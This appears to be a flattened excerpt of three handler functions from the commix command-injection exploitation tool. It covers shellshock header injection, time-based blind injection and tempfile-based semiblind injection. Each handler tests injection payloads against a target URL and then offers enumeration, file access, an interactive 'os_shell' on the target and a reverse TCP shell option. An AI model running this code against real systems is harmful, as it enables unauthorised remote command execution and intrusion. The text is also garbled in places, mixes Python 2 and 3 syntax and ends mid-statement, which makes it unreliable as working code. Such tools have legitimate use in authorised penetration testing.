def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" info_msg = "Testing the " + technique + ". " if settings.VERBOSITY_LEVEL >= 2: info_msg = info_msg + "\n" sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: sys.stdout.write("\n" + settings.print_payload(payload)) elif settings.VERBOSITY_LEVEL >= 2: debug_msg = "Generating payload for the injection." print(settings.print_debug_msg(debug_msg)) print(settings.print_payload(payload)) header = {check_header : payload} request = _urllib.request.Request(url, None, header) if check_header == "User-Agent": menu.options.agent = payload else: menu.options.agent = default_user_agent log_http_headers.do_check(request) log_http_headers.check_http_traffic(request) # Check if defined any HTTP Proxy. if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor. elif menu.options.tor: response = tor.use_tor(request) else: response = _urllib.request.urlopen(request, timeout=settings.TIMEOUT) percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if str(float_percent) == "100.0": if no_result == True: percent = settings.FAIL_STATUS else: percent = settings.info_msg no_result = False elif len( > 0 and cve in percent = settings.info_msg no_result = False else: percent = str(float_percent)+ "%" if settings.VERBOSITY_LEVEL == 0: info_msg = "Testing the " + technique + "." + "" + percent + "" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if no_result == False: # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) vuln_parameter = "HTTP Header" the_type = " " + vuln_parameter check_header = " " + check_header vp_flag = logs.add_parameter(vp_flag, filename, the_type, check_header, http_request_method, vuln_parameter, payload) check_header = check_header[1:] logs.update_payload(filename, counter, payload) if settings.VERBOSITY_LEVEL != 0: checks.total_of_requests() info_msg = "The (" + check_header + ") '" info_msg += url + Style.RESET_ALL + Style.BRIGHT info_msg += "' seems vulnerable via " + technique + "." if settings.VERBOSITY_LEVEL < 2: print("") print(settings.print_bold_info_msg(info_msg)) sub_content = "\"" + payload + "\"" print(settings.print_sub_content(sub_content)) # Enumeration options. if settings.ENUMERATION_DONE == True : if settings.VERBOSITY_LEVEL != 0: print("") while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " enumerate_again = _input(settings.print_question_msg(question_msg)) else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "Y" if enumerate_again in settings.CHOICE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOICE_NO: break elif enumerate_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + enumerate_again + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True : while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " file_access_again = _input(settings.print_question_msg(question_msg)) else: file_access_again= "" if len(file_access_again) == 0: file_access_again = "Y" if file_access_again in settings.CHOICE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + file_access_again + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell, payload = cmd_exec(url, cmd, cve, check_header, filename) print("\n") + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL raise SystemExit() else: # Pseudo-Terminal shell print("") go_back = False go_back_again = False while True: if go_back == True: break if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " gotshell = _input(settings.print_question_msg(question_msg)) else: gotshell= "" if len(gotshell) == 0: gotshell= "Y" if gotshell in settings.CHOICE_YES: if not menu.options.batch: print("") print("Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)") if readline_error: checks.no_readline_module() while True: try: if not readline_error: # Tab compliter readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = _input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) go_back, go_back_again = check_options(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again) if go_back: break else: shell, payload = cmd_exec(url, cmd, cve, check_header, filename) if shell != "": # Update logs with executed cmds and execution results. logs.executed_command(filename, cmd, shell) print("\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n") else: debug_msg = "Executing the '" + cmd + "' command. " if settings.VERBOSITY_LEVEL == 1: sys.stdout.write(settings.print_debug_msg(debug_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload)+ "\n") elif settings.VERBOSITY_LEVEL >= 2: sys.stdout.write(settings.print_debug_msg(debug_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload)+ "\n") err_msg = "The '" + cmd + "' command, does not return any output." print(settings.print_critical_msg(err_msg) + "\n") except KeyboardInterrupt: raise except SystemExit: raise except EOFError: err_msg = "Exiting, due to EOFError." print(settings.print_error_msg(err_msg)) raise except TypeError: break elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + gotshell + "' is not a valid answer." print(settings.print_error_msg(err_msg)) continue break else: continue if no_result: if settings.VERBOSITY_LEVEL != 2: print("") err_msg = "All tested HTTP headers appear to be not injectable." print(settings.print_critical_msg(err_msg)) raise SystemExit() except _urllib.error.HTTPError as err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." print("\n") + settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() except _urllib.error.URLError as err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL != 0 and settings.LOAD_SESSION == False: print("") print(settings.print_critical_msg(err_msg)) raise SystemExit() except _http_client.IncompleteRead as err_msg: print(settings.print_critical_msg(err_msg + ".")) raise SystemExit()
def tb_injection_handler(url, delay, filename, http_request_method, url_time_response): percent = 0 counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False is_vulnerable = False export_injection_info = False how_long = 0 injection_type = "Blind Command Injection" technique = "time-based injection technique" # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = settings.MAXLEN # Check if defined "--url-reload" option. if menu.options.url_reload == True: print Fore.YELLOW + "(^) Warning: The '--url-reload' option is not available in "+ technique +"." + Style.RESET_ALL percent = str(percent)+"%" sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() # Calculate all possible combinations total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION)) for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Define alter shell alter_shell = menu.options.alter_shell # Change TAG on every request to prevent false-positive results. TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6)) tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: # Log previous 'how_long' for later comparison previous_how_long = how_long if alter_shell: # Time-based decision payload (check if host is vulnerable). payload = tb_payloads.decision_alter_shell(separator, TAG, output_length, delay, http_request_method) else: # Time-based decision payload (check if host is vulnerable). payload = tb_payloads.decision(separator, TAG, output_length, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) how_long = tb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) how_long = tb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) how_long = tb_injector.referer_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tb_injector.injection_test(payload, http_request_method, url) # Injection percentage calculation percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total * 1.0)),2)) if percent == 100 and no_result == True: if not menu.options.verbose: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = "" else: if how_long == previous_how_long + delay: # Time relative false positive fixation. if len(TAG) == output_length: tmp_how_long = how_long randv1 = random.randrange(0, 1) randv2 = random.randrange(1, 2) randvcalc = randv1 + randv2 cmd = "(" + str(randv1) + "+" + str(randv2) + ")" # Check for false positive resutls how_long, output = tb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long) if str(tmp_how_long) == str(how_long) and \ str(output) == str(randvcalc) and \ len(TAG) == output_length: is_vulnerable = True if not menu.options.verbose: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = "" else: break # False positive else: continue else: percent = str(float_percent)+"%" if not menu.options.verbose: sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except SystemExit: raise except: break # Yaw, got shellz! # Do some magic tricks! if how_long == previous_how_long + delay: if (len(TAG) == output_length) and (is_vulnerable == True): found = True no_result = False is_vulnerable = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL # Check for any enumeration options. if settings.ENUMERATION_DONE == True: while True: enumerate_again = raw_input("\n(?) Do you want to enumerate again? [Y/n/q] > ").lower() if enumerate_again in settings.CHOISE_YES: tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL pass else: tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) # Check for any system file access options. if settings.FILE_ACCESS_DONE == True: while True: file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower() if file_access_again in settings.CHOISE_YES: tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL pass else: tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) # Check if defined single cmd. if menu.options.os_cmd: cmd = menu.options.os_cmd check_how_long, output = tb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) # Exploirt injection result tb_injector.export_injection_results(cmd, separator, output, check_how_long) sys.exit(0) # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break gotshell = raw_input("(?) Do you want a Pseudo-Terminal? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" while True: try: # Tab compliter readline.set_completer(menu.tab_completer) readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) if os_shell_option == False: if no_result == True: return False else: return True elif os_shell_option == "quit": sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n" elif os_shell_option == "reverse_tcp": # Set up LHOST / LPORT for The reverse TCP connection. lhost, lport = reverse_tcp.configure_reverse_tcp() while True: if lhost and lport in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options(lhost) else: cmd = reverse_tcp.reverse_tcp_options(lhost, lport) result = checks.check_reverse_tcp_options(cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True break # Command execution results. from src.core.injections.results_based.techniques.classic import cb_injector whitespace = settings.WHITESPACES[0] response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Evaluate injection results. shell = cb_injector.injection_results(response, TAG) # Exploirt injection result if menu.options.verbose: print "" print Back.RED + "(x) Error: The reverse TCP connection has been failed!" + Style.RESET_ALL else: pass else: print "" # The main command injection exploitation. check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename) # Exploirt injection result tb_injector.export_injection_results(cmd, separator, output, check_how_long) print "" except KeyboardInterrupt: raise except SystemExit: raise elif gotshell in settings.CHOISE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass break if no_result == True: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response): # percent = "0.2" counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False is_vulnerable = False how_long_statistic = 0 export_injection_info = False how_long = 0 injection_type = "Semiblind Command Injection" technique = "tempfile-based injection technique" # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = settings.MAXLEN # Check if defined "--url-reload" option. if menu.options.url_reload == True: print Back.RED + "(x) Error: The '--url-reload' option is not available in " + technique + "!" + Style.RESET_ALL # percent = str(percent)+ "%" # sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") # sys.stdout.flush() # Calculate all possible combinations total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION)) for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive resutls. TAG = ''.join( random.choice(string.ascii_uppercase) for num_of_chars in range(6)) # The output file for file-based injection technique. OUTPUT_TEXTFILE = tmp_path + TAG + ".txt" alter_shell = menu.options.alter_shell tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: # Tempfile-based decision payload (check if host is vulnerable). if alter_shell: payload = tfb_payloads.decision_alter_shell( separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method) else: payload = tfb_payloads.decision( separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Encode payload to Base64 if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter( menu.options.cookie) how_long = tfb_injector.cookie_injection_test( url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter( menu.options.agent) how_long = tfb_injector.user_agent_injection_test( url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter( menu.options.referer) how_long = tfb_injector.referer_injection_test( url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tfb_injector.injection_test( payload, http_request_method, url) # Injection percentage calculation percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format( round(((num_of_chars * 100) / (total * 1.0)), 2)) # Statistical analysis in . how_long_statistic = how_long_statistic + how_long if output_length == tag_length - 1: how_long_statistic = 0 if percent == 100 and no_result == True: if not menu.options.verbose: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = "" else: if (url_time_response == 0 and (how_long - delay) >= 0) or \ (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \ (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) : # Time relative false positive fixation. if len(TAG) == output_length and \ how_long > (how_long_statistic / output_length): settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - delay randv1 = random.randrange(0, 1) randv2 = random.randrange(1, 2) randvcalc = randv1 + randv2 if settings.TARGET_OS == "win": if alter_shell: cmd = settings.WIN_PYTHON_DIR + "python.exe -c \"print (" + str( randv1) + " + " + str( randv2) + ")\"" else: cmd = "powershell.exe -InputFormat none write (" + str( randv1) + " + " + str( randv2) + ")" else: cmd = "echo $((" + str( randv1) + " + " + str( randv2) + "))" # Check for false positive resutls how_long, output = tfb_injector.false_positive_check( separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell, how_long, url_time_response) if (url_time_response == 0 and (how_long - delay) >= 0) or \ (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \ (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) : if str(output) == str( randvcalc) and len( TAG) == output_length: is_vulnerable = True how_long_statistic = 0 if not menu.options.verbose: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = "" else: break # False positive else: if not menu.options.verbose: percent = str(float_percent) + "%" sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() continue else: if not menu.options.verbose: percent = str(float_percent) + "%" sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() continue if not menu.options.verbose: sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except: percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format( round(((num_of_chars * 100) / (total * 1.0)), 2)) if percent == 100: if no_result == True: if not menu.options.verbose: percent = Fore.RED + "FAILED" + Style.RESET_ALL sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() else: percent = "" break else: percent = str(float_percent) + "%" #Print logs notification message percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() print "" logs.logs_notification(filename) raise else: percent = str(float_percent) + "%" break # Yaw, got shellz! # Do some magic tricks! if (url_time_response == 0 and (how_long - delay) >= 0) or \ (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \ (url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) : if (len(TAG) == output_length) and (is_vulnerable == True): found = True no_result = False is_vulnerable = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param( url) else: found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0: found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter( vp_flag, filename, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The (" + http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to " + injection_type + "." + Style.RESET_ALL print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title( ) + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub( "%20", " ", payload.replace( "\n", "\\n")) + Style.RESET_ALL if settings.TARGET_OS == "win": delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) time.sleep(1) # Check for any enumeration options. if settings.ENUMERATION_DONE == True: while True: enumerate_again = raw_input( "\n(?) Do you want to enumerate again? [Y/n/q] > " ).lower() if enumerate_again in settings.CHOISE_YES: tfb_enumeration.do_check( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL pass else: tfb_enumeration.do_check( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) # Check for any system file access options. if settings.FILE_ACCESS_DONE == True: while True: file_access_again = raw_input( "(?) Do you want to access files again? [Y/n] > " ).lower() if file_access_again in settings.CHOISE_YES: tfb_file_access.do_check( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL pass else: tfb_file_access.do_check( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) # Check if defined single cmd. if menu.options.os_cmd: check_how_long, output = tfb_enumeration.single_os_cmd_exec( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) # Export injection result tfb_injector.export_injection_results( cmd, separator, output, check_how_long) # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) try: # Pseudo-Terminal shell go_back = False go_back_again = False while True: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if menu.options.verbose: print "" if go_back == True: break gotshell = raw_input( "(?) Do you want a Pseudo-Terminal? [Y/n/q] > " ).lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer( menu.tab_completer) # MacOSX tab compliter if getattr( readline, '__doc__', '' ) is not None and 'libedit' in getattr( readline, '__doc__', ''): readline.parse_and_bind( "bind ^I rl_complete" ) # Unix tab compliter else: readline.parse_and_bind( "tab: complete") cmd = raw_input( """commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower( ) in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options( cmd.lower(), technique, go_back, no_result) if os_shell_option == False: if no_result == True: return False else: return True elif os_shell_option == "quit": # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": print Fore.YELLOW + "(^) Warning: You are already into an 'os_shell' mode." + Style.RESET_ALL + "\n" elif os_shell_option == "reverse_tcp": # Set up LHOST / LPORT for The reverse TCP connection. lhost, lport = reverse_tcp.configure_reverse_tcp( ) while True: if lhost and lport in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options( lhost) else: cmd = reverse_tcp.reverse_tcp_options( lhost, lport) result = checks.check_reverse_tcp_options( cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True break # Command execution results. from src.core.injections.results_based.techniques.classic import cb_injector separator = checks.time_based_separators( separator, http_request_method ) whitespace = settings.WHITESPACES[ 0] response = cb_injector.injection( separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Evaluate injection results. shell = cb_injector.injection_results( response, TAG) if menu.options.verbose: print "" print Back.RED + "(x) Error: The reverse TCP connection has been failed!" + Style.RESET_ALL else: pass else: print "" # The main command injection exploitation. check_how_long, output = tfb_injector.injection( separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) # Export injection result tfb_injector.export_injection_results( cmd, separator, output, check_how_long) except KeyboardInterrupt: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise elif gotshell in settings.CHOISE_NO: if checks.next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: # Delete previous shell (text) files (output) from temp. delete_previous_shell( separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) return True elif gotshell in settings.CHOISE_QUIT: # Delete previous shell (text) files 